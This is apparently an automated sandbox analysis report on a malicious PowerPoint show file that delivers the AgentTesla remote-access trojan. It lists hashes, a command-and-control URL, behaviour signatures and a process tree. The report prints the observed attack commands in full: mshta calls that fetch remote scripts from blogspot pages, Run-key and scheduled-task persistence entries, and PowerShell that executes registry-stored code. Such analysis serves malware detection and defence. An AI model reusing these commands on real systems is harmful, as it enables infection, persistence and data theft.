Analysis
-
max time kernel
116s -
max time network
131s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-01-2021 09:30
Static task
static1
Behavioral task
behavioral1
Sample
BankSwiftCopyUSD95000.pps
Resource
win7v20201028
Behavioral task
behavioral2
Sample
BankSwiftCopyUSD95000.pps
Resource
win10v20201028
General
-
Target
BankSwiftCopyUSD95000.pps
-
Size
99KB
-
MD5
7f0b415d0b7a76530b2f510a910811e5
-
SHA1
480594ad26c91dd9d719c80334285375540dc83e
-
SHA256
8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
-
SHA512
d9b3320b51f390a6f75e7e3102044557e6476103c94ec4451819b78b4503f8018fee7ce8f70657473b310b14b752935fac2b7e5caaeb318e09a9af317701d8f4
Malware Config
Extracted
agenttesla
http://64.188.18.218/webpanel-st/inc/6295ae82aa2db6.php
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
ping.exemshta.exeping.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2252 980 ping.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3120 980 mshta.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3228 980 ping.exe POWERPNT.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2988-30-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla behavioral2/memory/2988-31-0x00000000004376FE-mapping.dmp family_agenttesla -
Blocklisted process makes network request 8 IoCs
Processes:
mshta.exePowershell.exeflow pid process 28 3120 mshta.exe 30 3120 mshta.exe 32 3120 mshta.exe 34 3120 mshta.exe 35 3120 mshta.exe 37 3120 mshta.exe 38 3120 mshta.exe 41 2696 Powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
MSBuild.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts MSBuild.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defeduckgotfucked = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).phuttalylo)|IEX\"\", 0 : window.close\")" mshta.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\mithuiki = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).meather)|IEX\"\", 0 : window.close\")" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\checkmatebaby = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta https://backbones1234511a.blogspot.com/p/stback1.html\"\", 0 : window.close\")" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta https://startthepartyup.blogspot.com/p/backbone14.html\"\", 0 : window.close\")" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\bukun = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html\"\", 0 : window.close\")" mshta.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Powershell.exedescription pid process target process PID 2696 set thread context of 2988 2696 Powershell.exe MSBuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1620 taskkill.exe 1276 taskkill.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 980 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
Powershell.exeMSBuild.exepid process 2696 Powershell.exe 2696 Powershell.exe 2696 Powershell.exe 2988 MSBuild.exe 2988 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
taskkill.exetaskkill.exePowershell.exeMSBuild.exedescription pid process Token: SeDebugPrivilege 1620 taskkill.exe Token: SeDebugPrivilege 1276 taskkill.exe Token: SeDebugPrivilege 2696 Powershell.exe Token: SeIncreaseQuotaPrivilege 2696 Powershell.exe Token: SeSecurityPrivilege 2696 Powershell.exe Token: SeTakeOwnershipPrivilege 2696 Powershell.exe Token: SeLoadDriverPrivilege 2696 Powershell.exe Token: SeSystemProfilePrivilege 2696 Powershell.exe Token: SeSystemtimePrivilege 2696 Powershell.exe Token: SeProfSingleProcessPrivilege 2696 Powershell.exe Token: SeIncBasePriorityPrivilege 2696 Powershell.exe Token: SeCreatePagefilePrivilege 2696 Powershell.exe Token: SeBackupPrivilege 2696 Powershell.exe Token: SeRestorePrivilege 2696 Powershell.exe Token: SeShutdownPrivilege 2696 Powershell.exe Token: SeDebugPrivilege 2696 Powershell.exe Token: SeSystemEnvironmentPrivilege 2696 Powershell.exe Token: SeRemoteShutdownPrivilege 2696 Powershell.exe Token: SeUndockPrivilege 2696 Powershell.exe Token: SeManageVolumePrivilege 2696 Powershell.exe Token: 33 2696 Powershell.exe Token: 34 2696 Powershell.exe Token: 35 2696 Powershell.exe Token: 36 2696 Powershell.exe Token: SeIncreaseQuotaPrivilege 2696 Powershell.exe Token: SeSecurityPrivilege 2696 Powershell.exe Token: SeTakeOwnershipPrivilege 2696 Powershell.exe Token: SeLoadDriverPrivilege 2696 Powershell.exe Token: SeSystemProfilePrivilege 2696 Powershell.exe Token: SeSystemtimePrivilege 2696 Powershell.exe Token: SeProfSingleProcessPrivilege 2696 Powershell.exe Token: SeIncBasePriorityPrivilege 2696 Powershell.exe Token: SeCreatePagefilePrivilege 2696 Powershell.exe Token: SeBackupPrivilege 2696 Powershell.exe Token: SeRestorePrivilege 2696 Powershell.exe Token: SeShutdownPrivilege 2696 Powershell.exe Token: SeDebugPrivilege 2696 Powershell.exe Token: SeSystemEnvironmentPrivilege 2696 Powershell.exe Token: SeRemoteShutdownPrivilege 2696 Powershell.exe Token: SeUndockPrivilege 2696 Powershell.exe Token: SeManageVolumePrivilege 2696 Powershell.exe Token: 33 2696 Powershell.exe Token: 34 2696 Powershell.exe Token: 35 2696 Powershell.exe Token: 36 2696 Powershell.exe Token: SeDebugPrivilege 2988 MSBuild.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
POWERPNT.EXEMSBuild.exepid process 980 POWERPNT.EXE 980 POWERPNT.EXE 2988 MSBuild.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERPNT.EXEmshta.execmd.exePowershell.exedescription pid process target process PID 980 wrote to memory of 2252 980 POWERPNT.EXE ping.exe PID 980 wrote to memory of 2252 980 POWERPNT.EXE ping.exe PID 980 wrote to memory of 3120 980 POWERPNT.EXE mshta.exe PID 980 wrote to memory of 3120 980 POWERPNT.EXE mshta.exe PID 980 wrote to memory of 3228 980 POWERPNT.EXE ping.exe PID 980 wrote to memory of 3228 980 POWERPNT.EXE ping.exe PID 3120 wrote to memory of 2696 3120 mshta.exe Powershell.exe PID 3120 wrote to memory of 2696 3120 mshta.exe Powershell.exe PID 3120 wrote to memory of 2696 3120 mshta.exe Powershell.exe PID 3120 wrote to memory of 2896 3120 mshta.exe schtasks.exe PID 3120 wrote to memory of 2896 3120 mshta.exe schtasks.exe PID 3120 wrote to memory of 2824 3120 mshta.exe cmd.exe PID 3120 wrote to memory of 2824 3120 mshta.exe cmd.exe PID 2824 wrote to memory of 1620 2824 cmd.exe taskkill.exe PID 2824 wrote to memory of 1620 2824 cmd.exe taskkill.exe PID 2824 wrote to memory of 1276 2824 cmd.exe taskkill.exe PID 2824 wrote to memory of 1276 2824 cmd.exe taskkill.exe PID 2696 wrote to memory of 2988 2696 Powershell.exe MSBuild.exe PID 2696 wrote to memory of 2988 2696 Powershell.exe MSBuild.exe PID 2696 wrote to memory of 2988 2696 Powershell.exe MSBuild.exe PID 2696 wrote to memory of 2988 2696 Powershell.exe MSBuild.exe PID 2696 wrote to memory of 2988 2696 Powershell.exe MSBuild.exe PID 2696 wrote to memory of 2988 2696 Powershell.exe MSBuild.exe PID 2696 wrote to memory of 2988 2696 Powershell.exe MSBuild.exe PID 2696 wrote to memory of 2988 2696 Powershell.exe MSBuild.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\BankSwiftCopyUSD95000.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\SYSTEM32\ping.exeping.exe2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:2252 -
C:\Windows\SYSTEM32\mshta.exemshta http://1230948%1230948%1230948%[email protected]/dbgghasdnasdjasgdakgsdhv2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).meather)|IEX3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2988 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""lunkicharkhi"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://randikhanaekminar.blogspot.com/p/st2.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
PID:2896 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\taskkill.exetaskkill /f /im winword.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620 -
C:\Windows\system32\taskkill.exetaskkill /f /im EXCEL.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1276 -
C:\Windows\SYSTEM32\ping.exeping.exe2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:3228